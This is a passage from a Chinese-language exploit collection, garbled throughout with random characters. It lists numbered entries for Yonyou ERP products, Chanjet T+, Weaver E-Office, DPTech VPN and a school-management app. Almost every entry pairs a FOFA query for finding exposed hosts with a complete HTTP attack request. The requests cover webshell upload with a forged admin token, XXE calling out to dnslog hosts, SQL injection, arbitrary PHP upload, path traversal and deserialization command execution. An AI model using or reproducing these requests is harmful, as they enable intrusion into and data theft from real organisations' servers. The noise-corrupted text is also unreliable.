4 M% N/ T8 H3 ^3 u1 uFOFA:app="用友-NC-Cloud"" K5 ~; [- F N( e! q0 k! A1 s+ ?
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
9 J# `' S: `: T- A( ?Host: 203.25.218.166:8888+ L9 G0 k) O8 D( l! e! d
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info' T* O3 j' j/ W% G
Accept-Encoding: gzip, deflate M5 E# {4 }! W+ I" \
Accept: */*5 C8 d" ?4 z2 j- K
Connection: close
; B% w2 A/ |! L! _' V' j$ \accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
4 T2 h3 L- i/ z, ?2 t. m" HContent-Length: 190
- a0 N/ c. m6 pContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0% |. U( f- r @7 G
8 ^4 f1 ?' H+ [. h) Y# p! {
--fd28cb44e829ed1c197ec3bc71748df0
' c1 A3 ?3 Z. X' A' W9 _Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"' `3 c) v7 |2 {+ v
# }# W) @$ ]2 V6 J& Z' i<%out.println(1111*1111);%>2 \4 q8 I2 T. a1 z; Z% ?
--fd28cb44e829ed1c197ec3bc71748df0--0 J& t2 z. V# I- K
' C7 G5 k1 _/ f% x5 w7 B6 X Z1 |/ F4 h5 |3 k
36. 用友NC-Cloud soapFormat XXE
. N3 [; j' l! V/ c: RFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/") v% ]0 n# W$ t p
POST /uapws/soapFormat.ajax HTTP/1.1* W- B( \( d2 ~2 q& i
Host: 192.168.40.130:8989
! ?; F8 M' X# B) A# {' JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0( J0 E8 B/ c) P# a( ?
Content-Length: 263
! }+ k, f. X" H6 S( p+ wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! t6 x, U. o9 {
Accept-Encoding: gzip, deflate
4 d: B. T' ]) D- b) T- TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ M- ~+ _! b" h
Connection: close/ |7 }) C8 P H( x0 F: Z
Content-Type: application/x-www-form-urlencoded
( X' R( A) z* \6 X$ i. O3 BUpgrade-Insecure-Requests: 1' q9 U( z w( u# d7 v
* ~# u, _; T; x. T- |4 q1 ?+ Q6 _msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a8 @& a, m( ]$ w8 n% A9 i% z
5 f6 e6 H7 H6 h! x; O
9 Y! j) |8 p+ {37. 用友NC-Cloud IUpdateService XXE$ p$ [$ U( B: I, v; l8 @
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
# D# H. R. i2 i2 M: O9 q/ e" L& M1 I) vPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
/ J0 _; k! {9 C1 g; qHost: 192.168.40.130:8989( j+ \ g Y6 U( |+ i' n. L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36# Q) K! G6 f6 I" R4 d
Content-Length: 421
. q O5 v5 `/ F7 q; @) BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.90 E- l- d. g1 Y
Accept-Encoding: gzip, deflate
$ [$ u2 D. x8 ?0 r1 } I5 D& VAccept-Language: zh-CN,zh;q=0.9
$ x- ]+ g2 f6 T9 b" u# ?' J& dConnection: close
2 k: U8 ^9 l$ E9 P, ^& P% kContent-Type: text/xml;charset=UTF-81 h/ y/ r# o2 U
SOAPAction: urn:getResult- J' Q! C. I, r# J
Upgrade-Insecure-Requests: 1% `. S: G4 \, j( I* M9 [
6 E# N9 Y, w7 ?
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">' i9 f p3 _. |& R3 a$ W' [- j
<soapenv:Header/>
4 f3 o; f8 Z/ k" w, `<soapenv:Body>
- c g G H& ]- K: N8 p/ P; i<iup:getResult>9 k4 l4 E2 A+ s5 A
<!--type: string-->
6 e4 n2 E% h5 h/ i. I. H<iup:string><![CDATA[) g' @) k( e h' `0 _7 L
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
, t( q6 b8 C* v<xxx/>]]></iup:string>3 H; `0 {2 ^5 @/ ]0 r5 {; {6 v1 y
</iup:getResult>
* x q9 H7 w3 {; _7 W. J( {</soapenv:Body>
4 s: n& N9 A1 W</soapenv:Envelope>
! w7 P- R J5 R# p$ N8 p' r
& Y0 d1 f% m/ Z0 {0 H: Y# P/ \4 t
, G) ?2 N9 ]1 ^3 [& M% }( F
. W9 K0 R" I5 ~( o' m7 f. v9 Y) n38. 用友U8 Cloud smartweb2.RPC.d XXE
* K: S8 B) Z8 D+ v6 p, R0 D7 GFOFA:app="用友-U8-Cloud"9 z) ~3 @/ h* G- L0 ^" v5 L4 N3 H
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
: D% `, Z" V' c. SHost: 192.168.40.131:8088
7 [( b* N' u& R- e: K; N8 \( PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
4 e6 {8 k9 @* ?! v" X% |- fContent-Length: 2603 t: O5 l B- g7 O+ q/ m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
7 Q8 t% U& P) T4 F, NAccept-Encoding: gzip, deflate& d/ L3 V" }2 }# |9 ]7 t* l
Accept-Language: zh-CN,zh;q=0.9- q; q, ~9 E, Z: e: z
Connection: close1 P; P1 ]# @+ S; _0 D& @. X
Content-Type: application/x-www-form-urlencoded5 O0 Y n/ L. D# g; i' |
6 O! P7 v: }# h
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
( C% s( F9 Q f. r. z
! V4 o& Z9 v' k. p- {
6 ]$ U g: l; y) U7 K1 x39. 用友U8 Cloud RegisterServlet SQL注入# K. S6 F9 h. h, K
FOFA:title="u8c"( ?% z" h0 [, u+ ]" ^" z
POST /servlet/RegisterServlet HTTP/1.1& r7 |1 s, h& u9 v4 p
Host: 192.168.86.128:8089
) i' \# O# Y6 |' R1 @( uUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36( K3 a$ x/ g* c5 ^ D" n
Connection: close, L1 [5 I* N2 f
Content-Length: 85
8 j/ P: H& R) I0 q/ z" mAccept: */*4 D# m* ^: h1 w
Accept-Language: en
3 x5 r _) G' ?' _/ P7 H$ ?" A" ]Content-Type: application/x-www-form-urlencoded
$ d5 Z4 @1 X5 z& x9 r9 jX-Forwarded-For: 127.0.0.1' h# p; S5 C! O3 U6 p5 L3 X! i
Accept-Encoding: gzip
) x" b5 k9 {: [: U/ S( w' ?
4 A8 G/ f0 x6 fusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
/ }1 P# T3 U6 w
, R* F9 Y1 t9 r& C
: Y0 D9 M# ?( ~ v$ i7 _' G& e40. 用友U8-Cloud XChangeServlet XXE8 h- Q2 P+ u3 _/ N# h/ s+ Y6 k b
FOFA:app="用友-U8-Cloud"
6 }. ]( Q" T5 _POST /service/XChangeServlet HTTP/1.18 p* }+ o# `1 e U/ d
Host: x.x.x.x
' M' h- B5 |5 Y# }* Y/ \ V w# oUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 R1 g9 C2 Y" B8 |Content-Type: text/xml1 Y6 D* z0 v8 o P
Connection: close4 y5 c) u/ ?8 C2 n( H# F+ `8 W
5 J, \; `2 v1 n1 D0 t; i# K<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>/ Y5 w n" y- z8 f& z* E, o7 L% G
1 ~' {9 y6 o; r0 b
* Z! z. c# h- J, q: @7 n7 N* @: [41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
& b7 X5 h! M9 y0 Y1 _' UFOFA:app="用友-U8-Cloud"7 }5 n% @5 t7 b" h# t" n
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
; D: l6 t9 e) I7 R9 o/ U9 KHost:3 f% c% d3 R0 `9 n+ T6 R9 g# y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 G0 _( P$ |" u7 E1 M2 ~
Content-Type: application/json
: U; L+ C4 X3 B# Q2 ? \Accept-Encoding: gzip/ O# F# U2 M2 E6 l& F) \. \
Connection: close
6 n2 w& [, O2 x! j7 a
. e4 C- ]) a3 R" [" O) p) P; n2 O J4 n: ~$ q4 ~) M$ e$ ~) S$ L4 g0 I+ I9 R
42. 用友GRP-U8 SmartUpload01 文件上传
, [3 J0 s6 L9 mFOFA:app="用友-GRP-U8"
5 W: n4 Q- k! ^$ g3 P: TPOST /u8qx/SmartUpload01.jsp HTTP/1.1
; G9 V. P1 M/ Z. Z1 `: iHost: x.x.x.x2 S! R( [' C( E& v+ `6 F2 S0 p, N/ F
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt7 v) K0 o' T$ ^: L3 i6 q& v: t
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
' N( c9 U9 Q2 @% `
" ?: z* I' d' U# \! ePAYLOAD/ w6 U( `! x) y( \
' t8 R: i/ w1 {2 d. @ k# ]3 s: d; w( c$ `
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml, U, ?; g9 s( k9 |5 P% v) }
' V- e& Y# h% `6 ]' z5 R43. 用友GRP-U8 userInfoWeb SQL注入致RCE
1 H+ |3 F, s; P/ Q7 Z1 Q# aFOFA:app="用友-GRP-U8"
9 u0 q& ~5 m! _- s5 [! P- jPOST /services/userInfoWeb HTTP/1.1) m" u/ m- w0 ?4 l+ Q+ x& a- t
Host: your-ip( ?/ F ^ f0 |* _- R0 ], q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.367 ^3 P6 w3 d0 V# X* K. }9 `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# {/ Y8 B. r9 _9 A3 X
Accept-Encoding: gzip, deflate% }- ]( X# e: \' U
Accept-Language: zh-CN,zh;q=0.9
. O1 Y1 H- u% F0 l( {Connection: close
+ U6 e2 p E. }) qSOAPAction:) p) v1 F/ w/ a3 \/ F
Content-Type: text/xml;charset=UTF-8
! Q' p% g9 t- V/ U! r3 X. S3 ?3 j3 B6 |/ y, H; P
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">' e, o; |: V, D! z5 j$ j
<soapenv:Header/>
4 P" I4 u3 ~- M <soapenv:Body>7 V4 ^* S; R8 M3 R/ S( Q4 S
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">! q0 i q2 M s$ M
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
1 t$ b$ M& K, `2 f0 }$ u. L* ?0 J/ ?- N </ser:getUserNameById>
8 X' K6 | G y9 D </soapenv:Body>, ~* I9 l% h* y* {. ?0 j
</soapenv:Envelope>
n* X0 l! i3 `" n" D/ l. `7 c6 M3 Q( l% r5 N& z- K
0 N# i- ?7 x$ v7 q1 w' K44. 用友GRP-U8 bx_dj_check.jsp SQL注入' J$ |" C8 x2 t9 a: V4 P( p& R
FOFA:app="用友-GRP-U8"/ R, T2 Z" ]9 |
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
# a8 i6 y) _7 A- ]* u/ Z$ ^% M0 nHost: your-ip+ @7 q. [% m; l; c9 g9 w! s
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
/ I( g3 z2 |- t) J2 wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 |! l e" N- a. h
Accept-Encoding: gzip, deflate k& F! w3 X$ N9 E; E
Accept-Language: zh-CN,zh;q=0.9( e+ i9 L( I0 B9 ?
Connection: close
8 E2 I3 G9 ]5 H" V+ }
+ i2 {. _. ^! F% n3 b( { t7 a: ?( m& f% h5 o. r% p; P
45. 用友GRP-U8 ufgovbank XXE# |) \, T9 ?" G' j
FOFA:app="用友-GRP-U8"7 l# y( a' J2 S
POST /ufgovbank HTTP/1.1
! j9 ~, G" \6 e0 C \Host: 192.168.40.130:222
3 \1 c. A3 V( _" h: h4 F2 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
( B: q. s$ Z! x& Z% @3 j6 GConnection: close; n' _1 u1 m: F9 H0 J
Content-Length: 161
* n; b; r3 V4 L' z% V, X" @! nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" }% F' ^( a& J. b% kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. f& C+ K. G8 h$ c: @2 wContent-Type: application/x-www-form-urlencoded" n7 ?( u" s L% \2 n" r
Accept-Encoding: gzip
% K$ H0 N' [! |! M$ _
2 k2 ^ ?# W# n0 _9 M, _reqData=<?xml version="1.0"?>
. H& z; V* O' `$ V/ U5 l' ]4 s<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest# v, `% s0 Y- _* x# t4 x
O/ x1 `; h6 s
- |4 g- `# }) H M) j0 T* D, F/ a46. 用友GRP-U8 sqcxIndex.jsp SQL注入
. x. M) k7 V1 a5 \' PFOFA:app="用友-GRP-U8"
% }% }& C; ?5 B: S2 O1 DGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1' n; s0 K2 f5 H$ @
Host: your-ip
0 {0 a: W" E x; i, i) } K) p8 B8 j7 ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.361 B+ U! v( z4 w, D5 g: w9 I0 R; e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: S0 _# T' ^4 y9 x0 A
Accept-Encoding: gzip, deflate
( E: ^4 Y; z+ B( l( g" | x4 { `* T8 cAccept-Language: zh-CN,zh;q=0.92 Y# I$ h0 o) G* S. Y3 d
Connection: close; E+ T! q% g B n
9 k( h9 v; V+ e3 n0 I! A e, d( Q9 W
, M$ U1 f" T" @+ t
47. 用友GRP A++Cloud 政府财务云 任意文件读取" w0 y1 S& \: w2 k. w& O
FOFA:body="/pf/portal/login/css/fonts/style.css"! r4 ]3 S7 B# U$ O. y8 }
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
% n( q' @ d @: { d lHost: x.x.x.x- ^% Q8 R" d% K) A6 Q
Cache-Control: max-age=0- A' L' a H$ f3 ^- E0 }& O8 _
Upgrade-Insecure-Requests: 15 R/ y5 I# F( Z6 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.365 K& m7 n9 G" `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.77 P! d4 m- R& E9 x! T" c
Accept-Encoding: gzip, deflate, br T$ [* D1 ?% {3 S$ B6 Y2 |3 p6 `
Accept-Language: zh-CN,zh;q=0.9
! F' p2 D6 T% X$ ?8 j$ S* B% bIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
) N: b' I, I; zConnection: close, m; E: Q1 e. u: E
/ r$ Q0 F$ t' Z4 V" w' x
' k( c8 K, R: y. \$ u
4 q& S% @, Z- o, i48. 用友U8 CRM swfupload 任意文件上传
+ l7 L* y! G5 ]( t: F% b) K8 r! X& oFOFA:title="用友U8CRM"1 D8 v+ T& M( p$ k# v) C' _
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
2 c, ?9 i1 U( I" k( \" \2 S6 @Host: your-ip
7 A" S! x% L3 q8 f2 d( o8 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
7 M9 ]! U2 e) f0 g! M( wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: @' c$ n$ U- ?4 U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 R/ N% S8 c4 WAccept-Encoding: gzip, deflate
/ C- T9 k0 f6 }6 k4 ~+ |5 SContent-Type: multipart/form-data;boundary=----2695209672394068716424300668553 N7 ^1 ~: Y; T7 g5 j6 Y1 g( I
------269520967239406871642430066855
, V; Q' w8 x2 J9 V2 ~" zContent-Disposition: form-data; name="file"; filename="s.php"
7 r% L8 a/ f" U3 K/ \1 w v1231
+ p' k8 a# _' v3 p ~- oContent-Type: application/octet-stream% j* k7 z6 ~ t+ d) o3 B; X% Y) |( a
------269520967239406871642430066855. _" |: s U5 r) L6 u; O I
Content-Disposition: form-data; name="upload"2 {3 r! c- I7 E3 J+ R2 c
upload
2 v/ P) i9 t# f5 w: b------269520967239406871642430066855--6 b. L* F3 D. u1 @3 I3 G
, x' q+ w8 m+ g) x1 e
4 {# b7 M7 E) }# y6 |; J49. 用友U8 CRM系统uploadfile.php接口任意文件上传
0 D# m( P, y0 t$ FFOFA:body="用友U8CRM"
( [8 y0 n0 f6 B: k& I& E' p$ A/ d
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1" W4 U9 o; ~9 O i. l( D
Host: x.x.x.x: C* `+ l* h" W; |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+ k9 R9 W, ?& i' \9 [3 s# lContent-Length: 329
/ h2 \' d( I) {1 ?7 V+ }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 b5 q' a$ S# C9 o9 M: m2 {
Accept-Encoding: gzip, deflate$ s! }6 k/ n3 g- v- @
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
{( S# Q# c2 H; M8 i' H) i7 TConnection: close
c. e1 N, h- W0 G. K( \Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w5 L6 a {2 c i. _# D
' U' {! v: s X& ^
-----------------------------vvv3wdayqv3yppdxvn3w
4 y4 |- c/ s' s/ ]Content-Disposition: form-data; name="file"; filename="%s.php "/ _' |1 T# E& s. c5 T% d6 t
Content-Type: application/octet-stream: M5 r$ l& T6 [
+ `0 |) I8 V1 N/ v) Y* Fwersqqmlumloqa
7 n$ I; |* z# [-----------------------------vvv3wdayqv3yppdxvn3w" Y0 W6 D- S5 d; ^
Content-Disposition: form-data; name="upload"
9 e# ]! T7 Z. M- M6 S! M. \! e6 @: R2 W
7 I0 d* |. X, oupload
8 @3 n2 s) w0 k: x-----------------------------vvv3wdayqv3yppdxvn3w--
/ z+ Q+ w7 p$ y# M2 k" g) @
7 \4 U& v$ ~/ {4 o* y
8 E" m2 G1 r6 ^2 I/ I: bhttp://x.x.x.x/tmpfile/updB3CB.tmp.php
- T' h- h7 z3 n* D/ j9 P) h& t5 f- |$ w; y% K
50. QDocs Smart School 6.4.1 filterRecords SQL注入
4 U" n, P6 }! TFOFA:body="close closebtnmodal"
1 H" @( D! x' d: Y6 z& pPOST /course/filterRecords/ HTTP/1.1
/ s8 G% p1 Y8 nHost: x.x.x.x
, E2 l# O5 ~' I2 v' ~' JUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.369 y2 _0 @' n& s2 t4 W3 O0 }
Connection: close
8 e. T1 q* l! C8 t6 M+ s' |" yContent-Length: 224
: E! {* O1 }# ?5 Q4 M8 ~* K0 n$ A4 |Accept: */** T0 e2 P! R- C2 _, r& |5 a5 T
Accept-Language: en
" L/ w+ J1 O$ {( \1 xContent-Type: application/x-www-form-urlencoded
# M, M" G$ a# G6 ?6 J, PAccept-Encoding: gzip6 ^ C# p' R1 b0 y; @ c
* |7 k+ f6 v% s W* S& Fsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=14 x B' r$ {6 s$ l; C. _0 n
( V) L- O3 | e7 P+ P6 n* j5 s% v# j$ Q! a/ Q B0 h! C+ W6 E- `
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入% e7 L% {0 a- D. T% u
FOFA:app="云时空社会化商业ERP系统"
3 `% @+ X1 H# Y4 g7 u2 r! {; l+ ~GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
$ v% z! N( u! S* l; |* _Host: your-ip
) U' @" k: ~1 Z5 s" D( i9 tUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
; l$ `% ^1 d. K4 |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
* V8 F m; k M, }5 FAccept-Encoding: gzip, deflate
3 q- c7 I* g; T `Accept-Language: zh-CN,zh;q=0.9
' I% P' d9 p" c. oConnection: close
2 J; m y/ B0 ^, \9 J) N
% h( I/ V) p- a: e$ U- O
% w1 W- z* Z2 f1 F# d1 a52. 泛微E-Office json_common.php sql注入" p W0 d/ p2 e" b1 f
FOFA:app="泛微-EOffice"2 Z! Z! N6 O5 I" J0 S
POST /building/json_common.php HTTP/1.1
' j5 e: \1 }; KHost: 192.168.86.128:8097
; s! t1 q" D3 o2 A# b l3 l* O( aUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36$ ~& \7 i6 d" a+ d# C1 t; V3 s, a9 P
Connection: close
+ L; L( |% y) ]& T$ C; QContent-Length: 87
. `$ `* M4 k. E O$ xAccept: */*0 I m7 W# d* `; {0 `) U
Accept-Language: en. u( c9 o. U$ {0 ~# L
Content-Type: application/x-www-form-urlencoded
9 p6 q( H- q3 J7 k2 `4 C4 XAccept-Encoding: gzip
s9 T* B. m; W" F
1 p& E, C& H" b2 W% w! ctfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
+ }9 m% u# `% O" t o: m/ \
5 c+ r9 _/ v" Y% ^' n: G6 F
( J$ f6 ^% R; g- O- h53. 迪普 DPTech VPN Service 任意文件上传
( `9 m/ ]2 D8 E$ XFOFA:app="DPtech-SSLVPN"6 l& m& E8 O' O0 z8 ^/ H5 a
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd* f5 \4 j' V5 N1 I* `; j2 v
, z* o# X. g8 |( S9 u, b2 `6 J/ H* T' U" p b
54. 畅捷通T+ getstorewarehousebystore 远程代码执行; U7 n& {% J: v# e& ?4 a
FOFA:app="畅捷通-TPlus"
4 `, U4 s; [% c$ c# B第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
. _( n9 Z- `7 T"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
, }: A" l% n# @/ M5 Q3 x
, D0 ]1 {' ~4 H, [1 c, H/ {$ d- A- a, \6 Z0 r
完整数据包
: A/ |9 e9 Y) K( X4 B J, tPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1! L: ?$ ]% a9 S, n+ e
Host: x.x.x.x
F7 ?0 h- n1 A+ n2 ?2 RUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F# ^" V O( S; k3 M, @; W
Content-Length: 593' Q6 C N2 N6 t k/ Z3 P. u( r
5 p4 f$ i* n8 G, Y" f6 f{
) D0 l! g+ V, b"storeID":{
& K! {7 j0 [3 y- ~1 g "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
, H. Z5 J' o2 B, R9 E0 z( z "MethodName":"Start",/ d3 A; ?8 W# u7 W' w8 M& Q1 G
"ObjectInstance":{9 P- B4 j/ |/ \ w( R4 S: E# h
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
! d( q2 }/ s2 H, H$ f5 ] "StartInfo":{; s4 q/ V2 s6 `; g
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",6 v7 p9 \; o' |, f+ R! H( u
"FileName":"cmd",) J" R7 G; Z" Q7 a [- L
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
Y1 e& G* a- n+ m! a2 l }
$ W. \9 S# \. W3 R5 m5 X' l7 K }
/ t8 a2 a# J2 {9 f0 S% Y2 n }
3 c3 c! H$ ~% D6 Q6 R} ] L# v( i6 s$ l
3 }! g, w. O' D7 F7 z) ]$ ? W
第二步,访问如下url2 d' @* R" q: f6 I0 Y
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
% q" N& J5 {6 k( j; ~. k4 Y6 f
4 p+ s& n0 [# b8 p: k1 ]
( C' N, v% |2 ?& t55. 畅捷通T+ getdecallusers信息泄露9 i7 I& @1 ^' \4 b. Y5 N
FOFA:app="畅捷通-TPlus"
4 _& {/ k. O6 z; Y2 [第一步,通过
# S3 K V. _/ a' K* o8 i; f/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie O# `5 m- `! d8 U! R1 m6 \) x/ n
第二步,利用获取到的Cookie请求* x7 G: C. K: p" D! e: H
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers' {. @/ u. E6 H9 R1 d, o' b6 b
/ n* P* I$ @! C56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE: Z5 D2 Q# @: W Q- b
FOFA: app="畅捷通-TPlus"
+ d$ H9 r0 l( s9 CPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
# C, ?5 w, X1 R8 D/ D8 I2 [Host: x.x.x.x
